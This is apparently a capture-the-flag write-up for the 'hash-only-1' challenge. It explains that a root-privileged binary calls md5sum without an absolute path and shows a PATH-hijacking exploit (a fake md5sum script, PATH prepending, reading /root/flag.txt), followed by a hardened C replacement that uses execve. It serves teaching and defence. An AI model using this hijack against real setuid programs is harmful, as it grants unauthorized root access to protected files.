hash-only-1

Decompiling the binary gives:

setgid(0);
setuid(0);
// ...
system("/bin/bash -c 'md5sum /root/flag.txt'");

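The system() call is made after elevating privileges to root, and md5sum is invoked by name rather than by absolute path, so bash resolves it through the caller's PATH.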

Create a malicious md5sum script in /home/ctf-player/:

#!/bin/bash
cat "$1"

Set the script's permissions, prepend its directory to PATH, and run the binary:

chmod 777 ./md5sum
export PATH=/home/ctf-player:$PATH
./flaghasher
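
For comparison, here is how a privileged helper can run the hashing tool without consulting the caller's PATH. This is an added example, not code from the challenge binary or the original writeup. It assumes the real tool lives at /usr/bin/md5sum; run_fixed, hash_file and CLEAN_ENV are hypothetical names.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed install location of the real tool; adjust per system. */
#define MD5SUM_PATH "/usr/bin/md5sum"

/* Fixed environment for the child: nothing is inherited from the caller. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };

/* Run prog with argv and CLEAN_ENV, without a shell. Returns the exit
 * status, or -1 if prog is not absolute or the child did not exit normally. */
int run_fixed(const char *prog, char *const argv[])
{
    if (prog == NULL || prog[0] != '/')
        return -1;                      /* never fall back to a PATH search */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(prog, argv, CLEAN_ENV);  /* execve performs no PATH lookup */
        _exit(127);                     /* reached only if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Hardened replacement for system("/bin/bash -c 'md5sum <file>'"). */
int hash_file(const char *file)
{
    char *const argv[] = { "md5sum", "--", (char *)file, NULL };
    return run_fixed(MD5SUM_PATH, argv);
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s FILE\n", argv[0]);
        return 2;
    }
    return hash_file(argv[1]);
}
```

With this form, a script named md5sum in a directory at the front of PATH is never considered, because no shell and no name lookup are involved.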